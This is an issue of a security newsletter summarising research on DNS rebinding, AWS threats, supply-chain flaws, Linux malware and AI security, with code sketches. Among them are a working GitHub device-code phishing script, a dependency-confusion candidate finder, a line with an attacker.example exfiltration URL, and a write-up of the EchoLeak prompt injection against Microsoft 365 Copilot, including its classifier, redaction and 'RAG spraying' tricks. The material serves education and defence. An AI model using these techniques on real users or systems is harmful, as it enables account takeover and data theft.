
[tl;dr sec] #284 - Google Cloud CISO Interview, AWS Threat Technique Catalog, Finding Secrets with AI

4 ways Google uses AI for security, catalog of AWS threat actor techniques, training a custom small language model to find secrets

Hey there,

I hope you’ve been doing well!

During RSA week I had the pleasure of interviewing Phil Venables (former Google Cloud & Goldman Sachs CISO) on effectively scaling security programs, how Google leverages AI for security, and more.

Phil writes one of the best cybersecurity blogs, which you should definitely check out if you haven’t already.

We discussed:

  • The challenge of scaling security from artisanal to industrial

  • Moving from lagging to leading indicators in cybersecurity

  • 4 ways Google uses AI for security

  • What’s under- and over-hyped in AI

Check out the cleaned up transcript and key takeaways here. ✍️ 

Or watch our discussion here. 📺️ 

Sponsor

📣 How 100+ Security Leaders Are Tackling AI Risk

AI adoption is accelerating—and new research shows most security programs are still working to catch up.

Wiz’s latest guide, AI Security Readiness: Insights from 100 Cloud Architects, Engineers, and Security Leaders, explores how organizations are approaching AI security today, where the biggest gaps exist, and what actions leading teams are taking to reduce risk.

Inside the report:

  • Data on how organizations are adopting and securing AI

  • Strategies teams are using to manage shadow AI and visibility gaps

  • A maturity model to benchmark your organization’s progress

  • Practical next steps to close the AI risk gap

Get a clear view into how real teams are securing AI in the cloud.

Super interesting to hear how many leaders and orgs are thinking about AI risk, and a maturity model to benchmark yourself against is 👌 

AppSec

DNS rebinding attacks explained: The lookup is coming from inside the house
GitHub’s Jaroslav Lobačevski gives an overview of how DNS rebinding attacks work and how they can bypass the same-origin policy to access internal applications or services binding to localhost. The post also describes a real-world vulnerability in the Deluge BitTorrent client's WebUI that allowed arbitrary file reads.

💡 See also the tool Singularity by my former NCC Group colleagues Gerald Doussot and Roger Meyer, and their DEF CON 27 talk: State of DNS Rebinding Attacks & Singularity of Origin.
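
For services that have to listen on localhost, one standard mitigation is validating the Host header, since a rebinding attack still sends the attacker’s hostname there. A minimal sketch (the allowlist values are hypothetical):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hosts legitimate clients are expected to use; anything else (e.g. attacker.example
# after a DNS rebind) is rejected before any application logic runs.
ALLOWED_HOSTS = {"localhost:8080", "127.0.0.1:8080"}

class HostCheckingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.headers.get("Host") not in ALLOWED_HOSTS:
            self.send_error(403, "Forbidden: unexpected Host header")
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"hello from a localhost-only service\n")

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), HostCheckingHandler).serve_forever()
```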

OWASP Top 10 for Business Logic Abuse
New project announced at OWASP Global AppSec EU 2025. Categories include (a toy sketch of #4 follows the list):

  1. Lifecycle & Orphaned Transitions Flaws

  2. Logic Bomb, Loops and Halting Issues

  3. Data Type Smuggling

  4. Sequential State Bypass
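
As a toy illustration of #4 (the project’s own definitions and examples may differ), here’s a refund handler that skips the expected state check versus one that enforces it:

```python
# Hypothetical order states: created -> paid -> shipped -> refunded
ORDERS = {"42": {"state": "created", "amount": 100}}

def refund_vulnerable(order_id: str) -> str:
    # Sequential state bypass: the refund is issued regardless of whether the
    # order was ever paid, because the current state is never checked.
    ORDERS[order_id]["state"] = "refunded"
    return "refund issued"

def refund_fixed(order_id: str) -> str:
    order = ORDERS[order_id]
    # Enforce the expected state machine: only paid orders can be refunded.
    if order["state"] != "paid":
        raise ValueError(f"cannot refund an order in state {order['state']!r}")
    order["state"] = "refunded"
    return "refund issued"
```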

Cybersecurity (Anti)Patterns: Frictionware
Eugene Lim shares his thoughts on building effective cybersecurity solutions and common anti-patterns. He emphasizes reducing friction in the onboarding process by leveraging existing systems: ideally you can roll out additional security controls invisibly to end users. If manual intervention is required, resourcing requirements scale with the size of your user base. Integrate with existing workflows and tools (where are developers already sending logs? Build your security stack on top of that).

Eugene gives a nice example at the end on how requiring SSO for devs to use Cloudflare allowed them to get visibility into new domains, which they could then auto-enroll in their domain monitoring tool to detect potential subdomain takeovers.
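
A rough sketch of that pattern: diff the zones visible in Cloudflare against what you already know about, and enroll anything new. The zones endpoint is real; enroll_in_domain_monitoring and the token env var are hypothetical stand-ins for whatever monitoring tool you use:

```python
import os
import requests

CF_API = "https://api.cloudflare.com/client/v4/zones"
HEADERS = {"Authorization": f"Bearer {os.environ['CLOUDFLARE_API_TOKEN']}"}

def list_zones() -> set[str]:
    """Return all zone (domain) names visible to this Cloudflare account."""
    zones, page = set(), 1
    while True:
        resp = requests.get(CF_API, headers=HEADERS,
                            params={"page": page, "per_page": 50}, timeout=30)
        resp.raise_for_status()
        body = resp.json()
        zones.update(z["name"] for z in body["result"])
        if page >= body["result_info"]["total_pages"]:
            return zones
        page += 1

def enroll_in_domain_monitoring(domain: str) -> None:
    # Placeholder: call your subdomain-takeover / domain monitoring tool here.
    print(f"enrolling {domain} in monitoring")

def main() -> None:
    known = set(open("known_domains.txt").read().split())
    for new_domain in sorted(list_zones() - known):
        enroll_in_domain_monitoring(new_domain)

if __name__ == "__main__":
    main()
```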

Kelly Shortridge: “Every hardening guide recommendation is a missed opportunity for a safer default”

Sponsor

📣 Permiso Discover: Identity Inventory & Visibility at No Cost

Permiso Discover is an identity inventory and visibility tool for human, non-human, and AI identities. Starting today, you can join the waitlist to gain early access to this powerful platform that helps you discover, classify, and manage your identity attack surface effectively.

The waitlist gets you early access to Permiso Discover and an instant tour of the full Permiso Platform, a genuine cloud and on-prem security product built by the team that responded to history’s worst identity-based breaches.

Identity is one of those key fundamentals that’s tough to get right, but super powerful when you do 👍️ 

Cloud Security

Critiquing Cloud Criminals: Ready for Smarter Cloud Attacks?
RSAC 2025 talk by Datadog’s Nick Frichette, in which he covers real-world AWS attacker tradecraft, critiques their techniques, and demonstrates improved methods that evade detection. He concludes by opening his arms wide and telling threat actors to “get good” and “Come at me bro.”

Hey ARNold: A Guide to All the Amazon Resource Identifiers Formats in AWS
Fog Security’s Jason Kao did a deep dive into AWS ARN formats, identifying 1,929 different ARNs supported by AWS IAM, significantly more than the 397 supported by AWS's Policy Generator. He found 152 ARNs without an Account ID specified in the ARN, and 171 without a Region. You can search all the ARNs here.
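
For reference, ARNs follow arn:partition:service:region:account-id:resource, and as the post highlights, some services omit the Region and/or Account ID. A quick sketch of splitting them apart:

```python
from typing import NamedTuple

class Arn(NamedTuple):
    partition: str
    service: str
    region: str      # may be empty, e.g. IAM and S3
    account_id: str  # may be empty, e.g. S3 bucket ARNs
    resource: str

def parse_arn(arn: str) -> Arn:
    # The resource part can itself contain ':', so only split the first 5 times.
    prefix, partition, service, region, account_id, resource = arn.split(":", 5)
    assert prefix == "arn", f"not an ARN: {arn}"
    return Arn(partition, service, region, account_id, resource)

print(parse_arn("arn:aws:iam::123456789012:role/Admin"))   # no Region
print(parse_arn("arn:aws:s3:::my-bucket/some/key"))        # no Region or Account ID
print(parse_arn("arn:aws:ec2:us-east-1:123456789012:instance/i-0abc1234"))
```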

Threat Technique Catalog for AWS
AWS has released a Threat Technique Catalog for AWS, describing techniques used by threat actors to exploit security misconfigurations or compromised credentials in customer AWS environments. The catalog is based on MITRE ATT&CK and includes AWS-specific techniques, CloudTrail event names, and mitigation recommendations, drawn from real security incidents the AWS CIRT has responded to.

💡 AWS releasing a threat catalog for AWS makes me think of the Obama medal meme.
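
Since each catalog entry lists the relevant CloudTrail event names, you can pivot straight to hunting. A minimal boto3 sketch (the event name is just an example, not pulled from a specific catalog entry):

```python
from datetime import datetime, timedelta, timezone

import boto3

cloudtrail = boto3.client("cloudtrail")

# Look back 24 hours for a specific API call; swap in the event name listed
# on the catalog technique you're investigating.
paginator = cloudtrail.get_paginator("lookup_events")
pages = paginator.paginate(
    LookupAttributes=[{"AttributeKey": "EventName", "AttributeValue": "GetSecretValue"}],
    StartTime=datetime.now(timezone.utc) - timedelta(days=1),
)

for page in pages:
    for event in page["Events"]:
        print(event["EventTime"], event.get("Username"), event["EventName"])
```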

Roles Here? Roles There? Roles Anywhere: Exploring the Security of AWS IAM Roles Anywhere
Palo Alto Networks’ Itay Saraf discusses security risks with AWS IAM Roles Anywhere, a service that allows external workloads to authenticate to AWS using X.509 certificates. The default configuration is overly permissive, potentially allowing attackers to access unintended roles if they obtain a valid certificate.

Key mitigations: Add conditions to role trust policies to restrict which trust anchors can assume a given role, use ACM Private CAs as trust anchors, and monitor Roles Anywhere resources closely.
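
A sketch of the first mitigation: a role trust policy with a condition that only allows sessions created through one specific trust anchor (the ARN and account ID are placeholders; check the post and AWS docs for the exact keys your setup needs):

```python
import json

# Trust policy restricting role assumption to a single Roles Anywhere trust anchor.
# Without the Condition block, any trust anchor in the account could be used.
trust_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {"Service": "rolesanywhere.amazonaws.com"},
            "Action": ["sts:AssumeRole", "sts:TagSession", "sts:SetSourceIdentity"],
            "Condition": {
                "ArnEquals": {
                    "aws:SourceArn": (
                        "arn:aws:rolesanywhere:us-east-1:111122223333:"
                        "trust-anchor/example-trust-anchor-id"
                    )
                }
            },
        }
    ],
}

print(json.dumps(trust_policy, indent=2))
```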

Supply Chain

GerriScary: Hacking the Supply Chain of Popular Google Products
Impressive find by Tenable’s Liv Matan: a vulnerability in Google's Gerrit code-collaboration platform, which allowed unauthorized code submission to at least 18 Google projects including ChromiumOS, Chromium, Dart, and Bazel. Read the post for a great walkthrough, but basically Gerrit has an insecure default permission such that an attacker could add malicious code to an already approved change, and potentially then win a race condition in the commit queue process to have it merged in.

💡 Write-ups like this are a great example of really understanding permissions and the state flow of a system. Awesome.

Introducing: GitHub Device Code Phishing
Praetorian’s John Stawinski, Mason Davis, and Matt Jackoski describe a new phishing technique called "GitHub Device Code Phishing" that exploits GitHub's OAuth2 device flow, similar to what attackers have been doing with Azure Active Directory (AAD) device code phishing. The attack involves generating a device code, convincing the target to authenticate it, retrieving the resulting OAuth token, and using it to access repositories, secrets, and CI/CD systems. Unfortunately you currently can’t disallow or disable the OAuth2 device flow for GitHub organizations or GitHub Enterprise, but the post concludes with some detection options.
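
Under the hood this is just GitHub’s documented device flow: two endpoints and some polling. A minimal sketch (the client ID is a hypothetical placeholder):

```python
import time

import requests

CLIENT_ID = "Iv1.example_client_id"  # hypothetical OAuth/GitHub App client ID
HEADERS = {"Accept": "application/json"}

# 1. Generate a device code and a short user code for the target to enter.
device = requests.post(
    "https://github.com/login/device/code",
    headers=HEADERS,
    data={"client_id": CLIENT_ID, "scope": "repo"},
    timeout=30,
).json()
print(f"Ask the target to visit {device['verification_uri']} "
      f"and enter code {device['user_code']}")

# 2. Poll until the target authorizes; GitHub then returns an OAuth token.
while True:
    time.sleep(device["interval"])
    token = requests.post(
        "https://github.com/login/oauth/access_token",
        headers=HEADERS,
        data={
            "client_id": CLIENT_ID,
            "device_code": device["device_code"],
            "grant_type": "urn:ietf:params:oauth:grant-type:device_code",
        },
        timeout=30,
    ).json()
    if "access_token" in token:
        print("token obtained:", token["access_token"][:8] + "…")
        break
```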

They also built GitPhish, an automated tool that generates device codes on-demand and delivers them via professional GitHub Pages sites, which they’ll be making public on June 26.

Netflix Vulnerability: Dependency Confusion in Action
Roni Carta describes how he and Shubham Shah discovered a dependency confusion vulnerability affecting Netflix: they were able to register an npm package with the same name as an internal Netflix dependency, which was then pulled in and run (remote code execution).

The methodology is interesting: they were able to use raw browser traffic from Assetnote to generate HTTP Archive (HAR) files, parse the JS bundles with a Rust-based AST parser (not regex), extract package names, and then register those names with Depi. Many modern sites dynamically load additional JavaScript, so if you only scrape them without using a headless browser, you miss valuable context.
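
A simplified sketch of the discovery step: pull script URLs out of a HAR capture, extract candidate package names, and check which are unclaimed on the public npm registry. The regex here is a naive stand-in for the AST parsing they actually used:

```python
import json
import re

import requests

def script_urls(har_path: str) -> list[str]:
    """Extract JavaScript URLs from a HAR file captured while browsing the target."""
    har = json.load(open(har_path))
    return [
        e["request"]["url"]
        for e in har["log"]["entries"]
        if e["request"]["url"].endswith(".js")
    ]

# Naive stand-in for real AST parsing: look for require("pkg") / from "pkg" strings.
PKG_RE = re.compile(r'(?:require\(|from\s)["\']((?:@[\w.-]+/)?[a-z0-9][\w.-]*)["\']')

def candidate_packages(js: str) -> set[str]:
    return set(PKG_RE.findall(js))

def unclaimed_on_npm(name: str) -> bool:
    # A 404 from the public registry means the name is free to register.
    return requests.get(f"https://registry.npmjs.org/{name}", timeout=30).status_code == 404

if __name__ == "__main__":
    names = set()
    for url in script_urls("target.har"):
        names |= candidate_packages(requests.get(url, timeout=30).text)
    for name in sorted(names):
        if unclaimed_on_npm(name):
            print("potential dependency confusion candidate:", name)
```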

Blue Team

sgInnora/sharpeye
By Innora: A Linux intrusion detection and threat hunting system that uses analytics, machine learning, and behavior-based detection to identify and alert on suspicious activities, potential compromises, and security threats in real time. Its detection capabilities include process analysis, network connection monitoring, file system integrity checks, SSH security, kernel module analysis, library inspection, privilege escalation detection, and more.

No Agent, No Problem: Discovering Remote EDR
Huntress’ Jonathan Johnson describes how to leverage the Performance Logs and Alerts (PLA) APIs to create remote, agentless EDR-like capabilities. He demonstrates using DCOM interfaces to enumerate, create and modify data collectors on remote systems without deploying agents. You can collect process, file, and network telemetry, as well as system configurations. Jonathan’s proof-of-concept tool JonMon-Lite showcases creating remote trace sessions and streaming parsed events to a central location.

The Evolution of Linux Binaries in Targeted Cloud Operations
Palo Alto Networks’ Nathaniel Quist and Bill Batchelor examine the growing threat of Linux Executable and Linkable Format (ELF) malware targeting cloud infrastructure, focusing on five actively updated families: NoodleRAT, Winnti, SSHdInjector, Pygmy Goat, and AcidPour.

These families use techniques like dynamic linker hijacking, abusing the LD_PRELOAD environment variable to inject malicious code into legitimate system processes; hooking into critical Linux services like the SSH daemon; and exploiting vulnerabilities or misconfigurations in containerized infrastructure to achieve persistence, maintain C2 channels, and exfiltrate data.
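
A small blue-team sketch for the LD_PRELOAD technique specifically: flag processes started with LD_PRELOAD set and any system-wide preload in /etc/ld.so.preload (legitimate uses exist, so treat hits as leads, not verdicts). Reading other users' /proc/<pid>/environ requires root:

```python
from pathlib import Path

def preloaded_processes() -> list[tuple[int, str, str]]:
    """Return (pid, comm, LD_PRELOAD entry) for processes started with LD_PRELOAD."""
    hits = []
    for proc in Path("/proc").iterdir():
        if not proc.name.isdigit():
            continue
        try:
            # /proc/<pid>/environ is NUL-separated KEY=VALUE pairs.
            env = (proc / "environ").read_bytes().split(b"\x00")
            comm = (proc / "comm").read_text().strip()
        except (PermissionError, FileNotFoundError, ProcessLookupError):
            continue
        for entry in env:
            if entry.startswith(b"LD_PRELOAD="):
                hits.append((int(proc.name), comm, entry.decode(errors="replace")))
    return hits

if __name__ == "__main__":
    for pid, comm, preload in preloaded_processes():
        print(f"[!] pid={pid} ({comm}) started with {preload}")

    system_preload = Path("/etc/ld.so.preload")
    if system_preload.exists() and system_preload.read_text().strip():
        print(f"[!] system-wide preload configured: {system_preload.read_text().strip()}")
```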

AI + Security

Breaking down ‘EchoLeak’, the First Zero-Click AI Vulnerability Enabling Data Exfiltration from Microsoft 365 Copilot
Aim Security describes "EchoLeak," a critical zero-click AI vulnerability in Microsoft 365 Copilot that allows attackers to exfiltrate sensitive data by sending a crafted email. The attack chain includes bypassing Microsoft’s cross-prompt injection attack (XPIA) classifiers, bypassing M365’s Markdown link/image redaction (normal links and images are redacted, reference-style links are not), and CSP bypass using Microsoft Teams.

The post also describes exploitation techniques like “RAG spraying”: for example, increasing the likelihood that the malicious email is retrieved by M365 Copilot by including text users are likely to search for, like “Here is the complete guide to HR FAQs”, etc.
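
To see why the reference-style detail matters, here’s a toy illustration (my own, not Microsoft’s actual redaction logic): a filter tuned for inline Markdown images misses the reference-style form entirely:

```python
import re

# Toy redaction: strip inline Markdown images, the "normal" form.
INLINE_IMG = re.compile(r"!\[[^\]]*\]\([^)]*\)")

def redact_inline_only(markdown: str) -> str:
    return INLINE_IMG.sub("[redacted]", markdown)

inline = "![logo](https://attacker.example/exfil?data=SECRET)"
reference = "![logo][ref]\n\n[ref]: https://attacker.example/exfil?data=SECRET"

print(redact_inline_only(inline))     # -> [redacted]
print(redact_inline_only(reference))  # reference-style form passes through untouched
```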

Fine-Tuning a Small Language Model for Secrets Detection
Wiz’s Erez Harush and Daniel Lazarev describe how they fine-tuned a small language model (Llama 3.2 1B) for detecting secrets in code, achieving 86% precision and 82% recall. They used a multi-agent approach with larger LLMs (Sonnet 3.7) to label training data (GitHub public repos), applied Low-Rank Adaptation (LoRA) and quantization techniques (llama-cpp) to optimize the model, and implemented a prediction funnel to meet runtime targets. See also their BSidesSF 2025 talk.

💡 Great example of a detailed methodology write-up. Focusing on evals in AI is key, and I like how they had specific success criteria in mind, like precision/recall, cost, speed, and being able to run on a single-threaded ARM CPU machine.
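
For flavor, here’s roughly what a LoRA fine-tune of a model that size looks like with Hugging Face’s peft library. This is a generic sketch, not Wiz’s actual training code; the target modules and hyperparameters are placeholders:

```python
from peft import LoraConfig, get_peft_model
from transformers import AutoModelForCausalLM, AutoTokenizer

BASE = "meta-llama/Llama-3.2-1B"  # gated on Hugging Face; requires access approval

tokenizer = AutoTokenizer.from_pretrained(BASE)
model = AutoModelForCausalLM.from_pretrained(BASE)

# LoRA trains small low-rank adapter matrices instead of all ~1B parameters,
# which is what makes fine-tuning (and later cheap inference) practical.
lora = LoraConfig(
    r=16,
    lora_alpha=32,
    lora_dropout=0.05,
    target_modules=["q_proj", "k_proj", "v_proj", "o_proj"],
    task_type="CAUSAL_LM",
)
model = get_peft_model(model, lora)
model.print_trainable_parameters()  # typically well under 1% of total parameters

# From here: format labeled (code snippet -> secret / not secret) pairs as prompts,
# train with transformers' Trainer or trl's SFTTrainer, then merge and quantize
# (e.g. via llama.cpp) for single-threaded CPU inference.
```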

Leaking Secrets in the Age of AI
Wiz’s Shay Berkovich and Rami McCarthy share their findings from a month-long scan of public code repositories on GitHub.

  • 4 out of the top 5 secret types were AI-related: e.g. Hugging Face, Weights & Biases, Azure OpenAI.

  • Jupyter Notebooks (.ipynb files) contained the most secrets. Note that even if secrets are properly stored in the code, they can leak in execution output (and be committed to the repo); see the sketch after this list.

  • mcp.json, .env, and AI agent config files were also a common source of secrets.

  • New secret types belonging to emerging AI vendors (e.g. Chinese vendors) are pervasive and many secrets scanners don’t support them yet.
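
Here’s a quick sketch of the notebook-output point above: scan .ipynb cell outputs (not just source) for token patterns like Hugging Face’s hf_ prefix. The pattern list is a tiny illustrative subset of what real scanners cover:

```python
import json
import re
import sys

# Illustrative subset of token patterns; real scanners ship hundreds of these.
PATTERNS = {
    "Hugging Face token": re.compile(r"hf_[A-Za-z0-9]{30,}"),
    "AWS access key id": re.compile(r"AKIA[0-9A-Z]{16}"),
}

def scan_notebook(path: str) -> None:
    nb = json.load(open(path))
    for i, cell in enumerate(nb.get("cells", [])):
        # Check both the cell source and any captured execution output.
        chunks = ["".join(cell.get("source", []))]
        for out in cell.get("outputs", []):
            chunks.append("".join(out.get("text", [])))
            chunks.append(json.dumps(out.get("data", {})))
        for name, pattern in PATTERNS.items():
            if any(pattern.search(chunk) for chunk in chunks):
                print(f"{path}: cell {i}: possible {name} (check outputs too!)")

if __name__ == "__main__":
    for nb_path in sys.argv[1:]:
        scan_notebook(nb_path)
```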

💡 A tale as old as time: you built a tool, now scan All The Things™️ with it.

💡 To take a meta perspective on this research process, the “Fine tuning an SLM” post is a nice methodology/tool overview post, and then this is a follow-up “and here’s what we found” post, demonstrating the value of the methodology and tool. I mention this because it might be useful to keep in mind when you’re thinking about your research.


✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint
@clintgibler